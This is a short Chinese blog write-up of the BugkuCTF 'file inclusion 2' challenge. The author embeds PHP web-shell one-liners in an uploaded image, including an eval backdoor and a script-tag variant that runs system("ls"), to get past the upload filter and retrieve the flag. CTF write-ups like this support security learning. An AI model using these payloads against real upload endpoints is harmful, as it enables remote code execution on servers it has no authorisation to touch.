欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

bugkuctf 文件包含2 writeup

程序员文章站 2022-03-04 19:46:28
...

  首先看网页源代码,发现bugkuctf 文件包含2 writeup

访问upload.php,进入上传页面。

    要求上传图片,开始构造一句话图片马。因为初学,一句话不太熟只知道

<?php @eval($_post[a]);?>

  把这句话加在图片(改为txt格式)的最后,再改回jpg。上传之后访问该图的存储路径,发现post数据没有反应。显示出来的我的"一句话"语句好像两头被转义了。想了好久不知道怎么办,主要不会更高级的一句话。后再看别人的wp,构造一句话为

<script language=php>system("ls")</script>

上传之后成功过访问图中的txt文件得flag。bugkuctf 文件包含2 writeup 

相关标签: CTF